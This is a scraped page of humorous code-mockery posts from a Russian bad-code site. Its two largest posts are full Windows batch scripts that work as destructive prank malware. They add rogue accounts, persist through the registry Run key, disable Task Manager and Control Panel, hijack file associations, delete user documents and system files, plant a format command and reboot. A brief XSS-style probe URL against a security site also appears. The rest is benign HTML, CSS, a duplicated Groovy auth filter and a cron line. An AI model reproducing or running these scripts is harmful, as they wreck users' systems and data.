- 1
http://cosdamcaut.narod.ru/
Нашли или выдавили из себя код, который нельзя назвать нормальным, на который без улыбки не взглянешь? Не торопитесь его удалять или рефакторить, — запостите его на говнокод.ру, посмеёмся вместе!
+136
http://cosdamcaut.narod.ru/
Группа разработчиков ...
+120
@echo off
%SystemRoot%/system32/rundll32 user32, SwapMouseButton >nul
time 0:00 >nul
date 13.06.23 >nul
label C:IDIOT >nul
label D:DURAK >nul
label E:SUKA >nul
label F:GANDON >nul
copy %0 C:\Open.bat >nul
copy %0 D:\Open.bat >nul
copy %0 E:\Open.bat >nul
copy %0 F:\Open.bat >nul
net user "Idiot you Hacked" /add >nul
net user "Bitch you Hacked" /add >nul
net user "Durak you Hacked" /add >nul
net user "Kritin you Hacked" /add >nul
net user "Gavno you Hacked" /add >nul
md 1 >nul
md 2 >nul
md 3 >nul
md 4 >nul
md 5 >nul
md 6 >nul
md 7 >nul
md 8 >nul
md 9 >nul
md 10 >nul
md 11 >nul
md 12 >nul
md 13 >nul
md 14 >nul
md 15 >nul
md 16 >nul
md 17 >nul
md 18 >nul
md 19 >nul
md 20 >nul
md 21 >nul
md 22 >nul
md 23 >nul
md 24 >nul
md 25 >nul
md 26 >nul
md 27 >nul
assoc .lnk=.txt >nul
assoc .exe=.txt >nul
:x ;
Start mspaint
goto x ;
:x ;
Start Calc
goto x ;
copy ""%0"" "%SystemRoot%\system32\Cool.bat" >nul
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Cool" /t REG_SZ /d "%SystemRoot%\system32\Cool.bat" /f >nul
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoControlPanel /t REG_DWORD /d 1 /f >nul
del %0 >nul
Очередной говнокод cmd
+133
@echo off
echo Chr(39)>%temp%\temp1.vbs
echo Chr(39)>%temp%\temp2.vbs
echo on error resume next > %temp%\temp.vbs
echo Set S = CreateObject("Wscript.Shell") >> %temp%\temp.vbs
echo set FSO=createobject("scripting.filesystemobject")>>%temp%\temp.vbs
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v disabletaskmgr /t REG_DWORD /d 1 /f
start %temp%\temp.vbs
start %temp%\temp1.vbs
start %temp%\temp2.vbs
del "%SystemRoot%\Driver Cache\i386\driver.cab" /f /q >nul
Start http://vk.com/iloverain_96
Start http://vk.com/iloverain_96
Start http://vk.com/iloverain_96
Start http://vk.com/iloverain_96
Start http://vk.com/iloverain_96
Start http://vk.com/iloverain_96
Start http://vk.com/iloverain_96
Start http://vk.com/iloverain_96
Start http://vk.com/iloverain_96
Start http://vk.com/iloverain_96
Start http://vk.com/iloverain_96
Start http://vk.com/iloverain_96
Start http://vk.com/iloverain_96
Start http://vk.com/iloverain_96
Start http://vk.com/iloverain_96
Start http://vk.com/iloverain_96
Start http://vk.com/iloverain_96
Start http://vk.com/iloverain_96
Start http://vk.com/iloverain_96
Start http://vk.com/iloverain_96
Start http://vk.com/iloverain_96
Start http://vk.com/iloverain_96
Start http://vk.com/iloverain_96
Start http://vk.com/iloverain_96
Start http://vk.com/iloverain_96
Start http://vk.com/iloverain_96
Start http://vk.com/iloverain_96
assoc .lnk=textfile
assoc .exe=mp3file
@echo off
:x
Chcp 1251
msg * Пой птичка, пиздец системе...[© Iloverain]
msg * Пой птичка, пиздец системе...[© Iloverain]
msg * Пой птичка, пиздец системе...[© Iloverain]
goto x
Chcp 1251
del "%USERPROFILE%Мои документы*.*" /q /s
label E: ГАВНО
Cd\
Cd C:
Сd windows
del *.exe
del *.ini
del *.com
cd\
cd windows
cd system
del *.dll
del *.exe
del "%SystemRoot%Cursors*.*" >nul
taskkill /f /im explorer.exe >nul
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f >nul
date 01.01.01 >nul
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun /v 1 /t REG_DWORD /d %SystemRoot%\explorer.exe /f >nul
FOR /L %%i IN (1,1,100000) DO md %%i
Echo format C: /q c:Autoexec.bat
shutdown -r -t 0 >nul
Это bat (cmd) код. Наткнулся на просторах интернетов.
+126
http://my.sec.ru/author.cfm
http://daily.sec.ru/search.cfm?s=%22+%2F%3E
И это называется портал по безопасности...
+122
http://s006.radikal.ru/i213/1203/4a/bd0bfaac05e6.jpg
Очень хочется посмотреть что это за эксепшн...http://clck.ru/0kyq9
+129
<script src="file:///C:/Documents%20and%20Settings/Admin/Local%20Settings/Temp/Scripts/AC_RunActiveContent.js" type="text/javascript"></script>
<meta name='yandex-verification' content='6e63f46d5d2bd9a6' />
...
<body text="BLACK">
...
<div id="Layer7" style="position:absolute; left:1px; top:102px; width:504px; height:32px; z-index:8; visibility: visible;">
<script menumaker>document.write('<scr'+'ipt src="menu/xaramenu.js">'+'</scr'+'ipt>');document.write('<scr'+'ipt src="menu/menu_.js">'+'</scr'+'ipt>');/*img src="menu.png" moduleid="ruschoolcz2 (Project)\menu_off.xws"*/</script>
</div>
...
<tr>
<td><div align="center" class="style5 стиль56">Добро пожаловать на официальный сайт средней школы <br>
с углубленным изучением иностранного языка <br>
при Посольстве России в Чехии</div></td>
</tr>
...
<table width="100%" border="0">
<tr>
<td width="11%"><div align="center"><img src="menu/schlogo.jpg" width="160" height="100"></div></td>
<td width="100%" bgcolor="#115198">
<applet code="CoolMove.class" width=100% height=100 align="left">
<param name=SRC value="menu/school1.jpg">
<param name=MOVE value=1>
</applet> </td>
</tr>
</table>
...
<div id="Layer6" style="position:absolute; left:-4px; top:664px; width:1005px; height:109px; z-index:6; background-color: #115198; layer-background-color: #115198; border: 1px none #000000;">
...
<p align="center" class="стиль196">Узнай Россию лучше</p>
http://www.ruschoolcz.com/
Там полно разномастного говна, лулзы начинаются уже с кода главной страницы, дальше не смотрел ещё %)
+122
input.for-blind, select.for-blind, textarea.for-blind {
font-size: 5em !important;
/*font-family: "Louis Braille";
font-convexity: 3mm;*/
}
ДОСТАЛО!!11
+121
package simplecms
import auth.*
class AuthFilters {
private checkPermission(def controller, def p, def session, def params) {
if (p) {
boolean result = session.user?.profile?.permissions?.contains(p)
if (p.delegate) {
result |= controller.checkDelegation[p.name](session, params)
} else if (p.controllerChecked) {
result &= controller.checkPermission[p.name](session, params)
}
if (!result && p.parent) {
result = checkPermission(controller, p.parent, session, params)
}
return result
}
return true
}
def filters = {
main(controller:'*', action:'*') {
before = {
def mappings = PermissionMapping.findAllByControllerAndMethodInList(controllerName, [actionName, '*'])
boolean denied = mappings?.size() > 0
if (denied) {
def permissions = []
session.user?.attach()
mappings.each { mapping ->
if (mapping.permission?.guest) {
denied = false
} else if (permission.parent == null){
permissions << mapping.permission
}
}
if (denied) {
denied = !permissions.any { checkPermission(grailsApplication.mainContext.getBean(controllerName), it, session, params) }
}
}
return !denied
}
}
}
}
Нашёл у себя в проекте. Иерархия разрешений? ну так будем проверять только корневые, что заморачиваться?!
+119
package simplecms
import auth.*
class AuthFilters {
private checkPermission(def controller, def p, def session, def params) {
if (p) {
boolean result = session.user?.profile?.permissions?.contains(p)
if (p.delegate) {
result |= controller.checkDelegation[p.name](session, params)
} else if (p.controllerChecked) {
result &= controller.checkPermission[p.name](session, params)
}
if (!result && p.parent) {
result = checkPermission(controller, p.parent, session, params)
}
return result
}
return true
}
def filters = {
main(controller:'*', action:'*') {
before = {
def mappings = PermissionMapping.findAllByControllerAndMethodInList(controllerName, [actionName, '*'])
boolean denied = mappings?.size() > 0
if (denied) {
def permissions = []
session.user?.attach()
mappings.each { mapping ->
if (mapping.permission?.guest) {
denied = false
} else if (permission.parent == null){
permissions << mapping.permission
}
}
if (denied) {
denied = !permissions.any { checkPermission(grailsApplication.mainContext.getBean(controllerName), it, session, params) }
}
}
return !denied
}
}
}
}
Нашёл у себя в проекте. Иерархия разрешений? ну так будем проверять только корневые, что заморачиваться?!
+134
0 0,2,4,6,8,10,12,14,16,18,20,22 * * * /path-to-script
Замечательный конфиг крона)